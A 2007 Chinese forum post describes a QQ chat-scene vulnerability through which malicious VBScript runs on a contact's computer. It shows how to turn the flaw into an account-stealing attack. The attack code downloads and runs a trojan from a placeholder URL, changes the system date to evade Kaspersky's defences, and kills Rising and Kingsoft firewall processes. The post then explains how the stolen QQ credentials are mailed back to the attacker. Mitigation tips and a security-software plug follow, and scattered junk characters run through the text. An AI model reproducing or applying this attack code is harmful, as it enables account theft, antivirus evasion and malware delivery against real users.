|
|
根据易观国际发布《2007年第2季度中国即时通讯市场季度监测》报告显示,中国活跃的IM软件账号已经达到了3.76亿个,其中拥有2.9亿活跃用户账号的腾讯QQ是当之无愧的IM王者。可是你知道吗,你的QQ现在很危险了!
5 a7 J: [0 F2 Y. `8 X/ t2 q- p6 t: i+ o
不需要什么高超的技巧,黑客就可以轻松地盗取你的QQ。想知道他们是怎么做的以及该如何避免自己的QQ被盗吗?快随小编一起看看QQ场景漏洞的破解之法(属于0DAY漏洞)。1 @, z. w* ~; S8 u
1 q3 M. _' E9 ^7 A' [ 月黑风高夜,黑客挖出了一个宝箱,里面盛放着光彩夺目的“QQ场景漏洞”。他们惊奇的发现,不需要有什么高超的技巧,只要懂一点基本的脚本代码编写,就可以轻松地盗取别人的QQ、秘密安装监控软件或破坏系统等。于是,地狱之门就被打开了,所有的QQ用户都被恐惧笼罩着。
2 n2 |' w4 o2 `1 |+ z0 N: x
! A. T) k' p0 f/ m 一、QQ场景漏洞的利用原理解析
+ [: I0 ^+ N, R* k! {: Z2 r$ }$ f( A; h, r3 b2 V/ a3 e+ a
聊天场景是QQ软件中的一项基本功能,可以让聊天的双方使用同样的场景,从而拉近聊天用户之间的距离。不过最新的QQ场景漏洞,可能会让大家的QQ有被盗的风险。
: l( y* J9 D3 ?0 D+ d
" z- J) h. f4 h! E 该漏洞的利用原理很简单,攻击者向其QQ列表内的用户发送一个恶意构造的场景,场景里面包括图片文件、VBScript.qqs文件和Config.qqs文件,其中VBScript.qqs文件就是编写恶意代码的地方,然后在远程系统中执行即可。5 Z: H( q: }' P# t7 t5 j
2 M( L3 x0 ?' n5 M 二、QQ场景漏洞的危害有多大/ V) m. @) C4 P: R6 B9 C! f
% @6 A3 n3 x X4 n7 v QQ场景漏洞的危害到底多大?重则可能系统崩溃,资料消失;轻则可能QQ被盗,这些后果都是很严重的。更可怕的是,漏洞的利用方法特别简单,不需要什么操作即可实现,会成为大量手痒的菜鸟黑客们的最爱。6 i- U T" C2 h( K1 C. s
3 v; ^& R- X1 w- J+ d3 M+ P; n 添加的脚本代码的作用不同,造成的危害性也会不同。比如,如果是一段文件下载脚本代码的话,那么代码就会自动下载设置的文件并默默地运行。如果下载的是木马后门程序的话,黑客就可以通过木马进行远程控制。如果是一段格式化代码的话,那么磁盘中的文件就会瞬间被清除掉。9 r& O0 K; O# e$ B' s/ `% d/ s
. p. ~# Q t( h6 u, H/ j3 B5 J 小提示:QQ场景漏洞的危害程度判断是参考了标准的次高危害漏洞(百度搜霸远程执行漏洞)和标准的中等危害漏洞(WMP AU文件除零漏洞)。
# N0 R- D0 E) F" w
- G3 W( H* M& Q* n, X8 @# r8 F& t7 K# s- @ 三、试用QQ场景漏洞 5 [. n& D* Q/ g+ W" G: {
7 U3 ~4 P8 w# c! x& _1 K$ X 首先,将QQ场景漏洞所需的场景文件下载到本地系统,解压后复制到系统中QQ的安装目录X:\Program Files\Tencent\QQ下面,这样在Scene文件夹中就多了一个场景目录。现在我们就可以进行测试操作,不过为了弹出窗口更加有个性化,我们要对场景目录真的脚本文件进行修改。+ g' J# f# _- E
# t3 s7 c$ c4 @8 l7 `& |
接着,用文本编辑器打开其中的VBScript.qqs文件,在文件代码中找到MsgBox这个消息函数,该函数后面跟着的就是该场景在执行后弹出的信息内容,这里我们可以将它设置为自己需要弹出的内容信息,比如设置为“电脑报,我的最爱!”。如果你熟悉VBS脚本,可以设置更有个性的语句。2 d6 _ Y" ~# t a. ^1 w
) Y( b( v7 c0 K
然后,随便在QQ联系人列表中找一个人,无论对方使用的是QQ还是TM都可以,双击打开其聊天窗口。然后点击工具栏中的“选择音乐场景”按钮,在弹出的窗口中选择打开“我的场景”标签,并且找到一个和场景目录名称相同的场景。这样这个带有VBS脚本的场景,就会自动的下载到远程好友的QQ 中并运行。" y5 x/ H. p( o
4 v) i' u4 P( y( P/ }
四、如何利用QQ场景漏洞盗QQ, I+ n/ `( {( b9 y9 _
w3 I8 e9 p1 O3 {" u0 P ?% F
漏洞用熟后,就可以开始盗QQ了。首选下载该漏洞的利用代码,然后进行简单的修改即可。下面就对代码的关键部分进行讲解。; G5 Y; A/ B% i
1 g4 ~% r+ E' z5 G( { iLocal = LCase("c:\mm.exe"):iRemote = LCase("http://www.****.com/mygim.exe")% P/ {0 Y. l# \/ S8 |$ s) U
/ r$ U0 R8 s& N; A) I& }! Q; l% a
代码作用是将文件下载到磁盘中指定的位置,我们只需要把其中的http://www.****.com/mygim.exe改为自己的木马地址即可。
. c4 _; V; G/ V' \) `# A# a
1 H/ h J# V6 S8 m/ M Set ws = CreateObject("Wscript.Shell")2 R0 k; w% M- g; p( z9 M
6 W1 G* w2 P" M# a2 ~4 e8 M7 q4 U
ws.run "cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 127.0.0.1&&date %date%",vbhide6 I5 \- {# Z* M$ M# |$ `! {9 s: j/ c
+ ^+ d8 d( x2 W% e3 a6 m+ c
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_proCESs").instances_ ?4 V$ O- y% X* Q `, N1 X
3 |, Q2 A2 Q$ Y5 M* d: z6 [9 W7 X3 N
if ps.Name="rfwsrv.exe" then) `6 y# _8 U5 [/ D
$ ?- ^2 O1 c& n, t
ws.run "ntsd -c q -p ps.handle",0. n) q9 L% {# I+ E3 V2 r, ~# g) @0 n
0 u5 L9 Y0 B# g' e* A 这段代码主要有两个作用,首先是通过修改系统的时间,从而让下载的木马程序躲过卡巴斯基的主动防御功能。接着用于检测系统中是否存在瑞星防火墙,如果存在的话就结束该防火墙的进程。
7 L2 {& x. r6 z2 w0 y9 D* T6 A3 Y& ^ }% O; P2 I5 m. F$ G' q
当然我们可以依葫芦画瓢来添加结束其他进程的代码,比如要结束金山网镖的进程,只需要将代码if ps.Name="rfwsrv.exe" Then中的rfwsrv.exe,替换为金山网镖的进程名称KPFW32.exe即可。经过这一系列的处理以后,盗号木马就能成功的获取远程用户的QQ号码,并且最终发送到我们指定的信箱里面呢。
# j$ ]/ f: `# M. L
- w9 v) |; z, J6 I! u 五、QQ场景漏洞的防范措施 % R( }! d3 G4 g0 ^
' p9 y0 n/ z6 B4 C
由于QQ场景漏洞是一个全新的0DAY漏洞,因此现在还没有现成的安全补丁可以使用,所以只能临时用其他的方法来进行相关的防范。有的人说TM没有聊天场景,因此可以利用TM来代替QQ,但是经过我们的测试发现TM依然受到该漏洞的影响。
- ]' D. Y4 _) @% U2 ]
" {* N0 n, G+ N. ?2 [; l 同样在联系人列表中任意的选择一位,接着点击工具栏中的“选择音乐场景”按钮,然后在“我的场景”标签中点击“在我的场景设置”按钮。现在只需要在弹出的窗口里面把“接受场景邀请”前面的勾去掉就可以啦。除此以外,还可以选择Scene目录的属性选项,将它的属性设置为只读即可。 M R& ^0 o- I- C x
4 F& |% d) ~* y: a* b& R: K
如果用户已经不信“中标”的话,那么现在还有两种方法可以解决。第一在“我的场景”标签里,选择“不使用场景”选项就可以。另外可以直接到QQ目录中的Scene文件夹,将它中的所有内容彻底删除,就可以完全避免以前的漏洞场景被重新激活。7 H+ a( j2 b- a) L& ?
! T, S; _/ l2 J7 l/ G. c 六、QQ场景漏洞的预防方案
- w) |4 w0 e' O8 \- @$ d7 R/ p+ ~# z. T; k
由于QQ场景漏洞是通过恶意脚本来进行操作的,因此要预防漏洞的方法就是防止非法的聊天场景写入系统磁盘。) b# }9 G/ R% Q1 ?
9 |& Q. n6 W+ Z5 A3 P8 {# O
我们可以通过一款名为《系统安全盾》的安全软件进行防范,该程序不但可以对设置的文件夹进行有效的监控,还可以对非法运行的程序进行有效的拦截操作,这样就从多个方面对系统安全进行保护,并且该程序的自身保护能力也非常的强,只有在正确的输入了确认码后才会弹出,有效的防止程序进程被恶意代码非法结束。, I' T* h7 g& j d* K1 C1 w" g
4 f/ J' u/ X2 R% N5 w' i7 H0 e
《系统安全盾》运行后,点击程序主界面中“监控设置”菜单中的“监控设置调整”命令。程序在默认的情况下,是无法将文件添加到系统目录的。为了更好的监控下载的聊天场景,我们点击鼠标右键来新增项目,双击新增的项目来设置新的监控路径,然后将项目内容都选择√选项。
" v1 J6 J2 J+ g( q+ X4 P: R& J* d6 K9 {! u
接着再在“文件黑名单”选项里面,将聊天场景中主要的VBScript.qqs文件添加到黑名单,更改配置后一定要点击“应用设置”按钮进行保存。这样当程序检测到这些可疑文件后,就会立即的进行拦截操作并提示用户。
2 _5 g7 ~1 B8 \( j
* X7 \! Y! y, ?: \5 k- x4 b 注:此文只用与交流,如利用本文的内容造成的后果请自行负责。 |
|
闽公网安备 35092202000206号 )
IP卡
狗仔卡
发表于 2007-9-13 18:53:07
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡